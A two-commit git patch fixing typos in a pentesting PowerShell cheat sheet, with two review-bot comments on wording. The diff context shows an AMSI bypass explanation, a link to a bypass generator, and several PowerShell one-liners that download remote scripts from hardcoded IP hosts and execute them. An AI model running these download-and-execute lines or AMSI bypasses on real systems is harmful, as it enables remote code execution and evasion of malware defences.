From d13f1d635510e33458548c4525112c549d719c8e Mon Sep 17 00:00:00 2001 From: Neved4 <63655535+Neved4@users.noreply.github.com> Date: Tue, 14 Jan 2025 22:52:11 +0100 Subject: [PATCH 1/2] Fix `you will are` with `you will use` in `basic-powershell-for-pentesters` --- .../basic-powershell-for-pentesters/README.md | 5 +---- 1 file changed, 1 insertion(+), 4 deletions(-) diff --git a/src/windows-hardening/basic-powershell-for-pentesters/README.md b/src/windows-hardening/basic-powershell-for-pentesters/README.md index 10e739d72..c91313906 100644 --- a/src/windows-hardening/basic-powershell-for-pentesters/README.md +++ b/src/windows-hardening/basic-powershell-for-pentesters/README.md @@ -141,7 +141,7 @@ ValueData : 0 **`amsi.dll`** is **loaded** into your process, and has the necessary **exports** for any application interact with. And because it's loaded into the memory space of a process you **control**, you can change its behaviour by **overwriting instructions in memory**. Making it not detect anything. -Therefore, the goal of the AMSI bypasses you will are to **overwrite the instructions of that DLL in memory to make the detection useless**. +Therefore, the goal of the AMSI bypasses you will use is to **overwrite the instructions of that DLL in memory to make the detection useless**. **AMSI bypass generator** web page: [**https://amsi.fail/**](https://amsi.fail/) @@ -465,6 +465,3 @@ RawDescriptor : System.Security.AccessControl.CommonSecurityDescriptor ``` {{#include ../../banners/hacktricks-training.md}} - - - From 700af4726a62fd8a22390e0d652f03f4ff8276d4 Mon Sep 17 00:00:00 2001 From: Neved4 <63655535+Neved4@users.noreply.github.com> Date: Tue, 14 Jan 2025 22:53:39 +0100 Subject: [PATCH 2/2] Fix `g` typo introduced in `2d9f506e60` --- src/windows-hardening/basic-powershell-for-pentesters/README.md | 1 - 1 file changed, 1 deletion(-) 
diff --git a/src/windows-hardening/basic-powershell-for-pentesters/README.md b/src/windows-hardening/basic-powershell-for-pentesters/README.md index c91313906..57906f6e3 100644 --- a/src/windows-hardening/basic-powershell-for-pentesters/README.md +++ b/src/windows-hardening/basic-powershell-for-pentesters/README.md @@ -23,7 +23,6 @@ Get-Command -Module ## Download & Execute ```powershell -g echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile - #From cmd download and execute powershell -exec bypass -c "(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('http://10.2.0.5/shell.ps1')|iex" iex (iwr '10.10.14.9:8000/ipw.ps1') #From PSv3
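Review bot: In patch 1/2, hunk `@@ -141,7 +141,7 @@`, the context paragraph directly above the corrected sentence still carries the same kind of wording slip: "exports for any application interact with" is missing "to", and "Making it not detect anything." is a sentence fragment. Since this commit is a grammar fix for that passage, consider fixing both in the same change, for example "exports for any application to interact with" and joining the fragment to the preceding sentence.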
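Review bot: In patch 1/2, hunk `@@ -465,6 +465,3 @@`, the three blank lines removed after `{{#include ../../banners/hacktricks-training.md}}` are not covered by the subject line, which only describes the `you will are` fix. Either mention the trailing-whitespace cleanup in the commit message or move it to its own commit, so the diffstat of 1 insertion and 4 deletions matches what the message says.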